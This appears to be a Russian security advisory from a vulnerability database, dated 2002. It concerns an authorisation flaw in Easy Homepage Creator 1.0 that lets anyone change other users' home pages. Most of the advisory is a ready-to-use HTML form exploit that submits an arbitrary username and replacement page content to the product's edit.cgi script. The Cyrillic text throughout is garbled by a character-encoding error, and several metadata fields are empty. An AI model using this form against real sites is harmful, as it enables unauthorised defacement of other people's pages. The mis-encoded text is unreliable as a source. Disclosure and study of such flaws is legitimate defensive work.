»зменение Home Page в Easy Homepage Creator

ƒата публикации:
05.08.2002
¬сего просмотров:
694
ќпасность:
Ќаличие исправлени€:
 оличество у€звимостей:
1
CVSSv2 рейтинг:
CVE ID:
Ќет данных
¬ектор эксплуатации:
¬оздействие:
CWE ID:
Ќет данных
Ќаличие эксплоита:
Ќет данных
”€звимые продукты:
ќписание: ”€звимость в Easy Homepage Creator позвол€ет неавторизованному пользователю измен€ть home page других пользователей. ѕример:
 
<html><center> 
<h1>Easy Homepage Creator Vulnerability</h1> 
<table border=0 cellpadding=2 cellspacing=1 width="90%"> 
<FORM method="POST" name=edit action="http://victim/homepage/edit.cgi"> 
Username: <input name="username"><br> 
You can edit other user homepage below : 
<textarea rows="17" id="homepage_edit" name="homepage_edit" cols="88"> 
Please type your messages in here. 
</textarea> 
<tr> 
<td class=top> 
<input class=button type="submit" 
value="Edit Homepage" name="edit_homepage"></td> 
</tr> 
</FORM> 
</table> 
</html>
у€звимость обнаружена в Ben Chivers Homepage Creator 1.0

—сылки: Easy Homepage Creator Vulnerability
или введите им€

CAPTCHA